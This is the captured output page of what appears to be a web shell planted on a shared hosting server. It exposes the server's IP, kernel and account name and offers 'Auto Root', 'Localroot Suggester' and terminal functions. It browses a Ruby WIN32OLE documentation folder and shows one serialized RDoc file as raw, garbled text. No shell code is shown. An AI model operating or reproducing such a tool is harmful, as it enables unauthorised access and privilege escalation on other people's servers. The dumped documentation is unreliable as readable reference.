Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby21 /
share /
ri /
2.1.0 /
system /
WIN32OLE /
Delete
Unzip
Name
Size
Permission
Date
Action
VARIANT
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
%5b%5d%3d-i.ri
854
B
-rw-r--r--
2023-07-26 17:52
%5b%5d-i.ri
837
B
-rw-r--r--
2023-07-26 17:52
_getproperty-i.ri
765
B
-rw-r--r--
2023-07-26 17:52
_invoke-i.ri
717
B
-rw-r--r--
2023-07-26 17:52
_setproperty-i.ri
792
B
-rw-r--r--
2023-07-26 17:52
cdesc-WIN32OLE.ri
3.29
KB
-rw-r--r--
2023-07-26 17:52
codepage%3d-c.ri
701
B
-rw-r--r--
2023-07-26 17:52
codepage-c.ri
418
B
-rw-r--r--
2023-07-26 17:52
connect-c.ri
637
B
-rw-r--r--
2023-07-26 17:52
const_load-c.ri
1.4
KB
-rw-r--r--
2023-07-26 17:52
create_guid-c.ri
440
B
-rw-r--r--
2023-07-26 17:52
each-i.ri
663
B
-rw-r--r--
2023-07-26 17:52
invoke-i.ri
756
B
-rw-r--r--
2023-07-26 17:52
locale%3d-c.ri
536
B
-rw-r--r--
2023-07-26 17:52
locale-c.ri
496
B
-rw-r--r--
2023-07-26 17:52
method_missing-i.ri
381
B
-rw-r--r--
2023-07-26 17:52
new-c.ri
865
B
-rw-r--r--
2023-07-26 17:52
ole_activex_initialize-i.ri
968
B
-rw-r--r--
2023-07-26 17:52
ole_free-c.ri
556
B
-rw-r--r--
2023-07-26 17:52
ole_free-i.ri
504
B
-rw-r--r--
2023-07-26 17:52
ole_func_methods-i.ri
608
B
-rw-r--r--
2023-07-26 17:52
ole_get_methods-i.ri
604
B
-rw-r--r--
2023-07-26 17:52
ole_initialize-c.ri
328
B
-rw-r--r--
2023-07-26 17:52
ole_method-i.ri
617
B
-rw-r--r--
2023-07-26 17:52
ole_method_help-i.ri
281
B
-rw-r--r--
2023-07-26 17:52
ole_methods-i.ri
562
B
-rw-r--r--
2023-07-26 17:52
ole_obj_help-i.ri
271
B
-rw-r--r--
2023-07-26 17:52
ole_put_methods-i.ri
604
B
-rw-r--r--
2023-07-26 17:52
ole_query_interface-i.ri
718
B
-rw-r--r--
2023-07-26 17:52
ole_reference_count-c.ri
532
B
-rw-r--r--
2023-07-26 17:52
ole_respond_to%3f-i.ri
590
B
-rw-r--r--
2023-07-26 17:52
ole_show_help-c.ri
651
B
-rw-r--r--
2023-07-26 17:52
ole_type-i.ri
515
B
-rw-r--r--
2023-07-26 17:52
ole_typelib-i.ri
676
B
-rw-r--r--
2023-07-26 17:52
ole_uninitialize-c.ri
332
B
-rw-r--r--
2023-07-26 17:52
setproperty-i.ri
744
B
-rw-r--r--
2023-07-26 17:52
Save
Rename
U:RDoc::AnyMethod[iI"const_load:ETI"WIN32OLE::const_load;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"HDefines the constants of OLE Automation server as mod's constants. ;TI"AThe first argument is WIN32OLE object or type library name. ;TI":If 2nd argument is omitted, the default is WIN32OLE. ;TI"FThe first letter of Ruby's constant variable name is upper case, ;TI"Bso constant variable name of WIN32OLE object is capitalized. ;TI"FFor example, the 'xlTop' constant of Excel is changed to 'XlTop' ;TI"in WIN32OLE. ;TI"@If the first letter of constant variabl is not [A-Z], then ;TI"7the constant is defined as CONSTANTS hash element.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"module EXCEL_CONST ;TI" end ;TI"/excel = WIN32OLE.new('Excel.Application') ;TI"-WIN32OLE.const_load(excel, EXCEL_CONST) ;TI"(puts EXCEL_CONST::XlTop # => -4160 ;TI"Fputs EXCEL_CONST::CONSTANTS['_xlDialogChartSourceData'] # => 541 ;TI" ;TI" WIN32OLE.const_load(excel) ;TI"%puts WIN32OLE::XlTop # => -4160 ;TI" ;TI"module MSO ;TI" end ;TI"EWIN32OLE.const_load('Microsoft Office 9.0 Object Library', MSO) ;TI"#puts MSO::MsoLineSingle # => 1;T:@format0: @fileI"ext/win32ole/win32ole.c;T:0@omit_headings_from_table_of_contents_below0I"/WIN32OLE.const_load( ole, mod = WIN32OLE) ;T0[ I"(p1, p2 = v2);T@'FI" WIN32OLE;TcRDoc::NormalClass00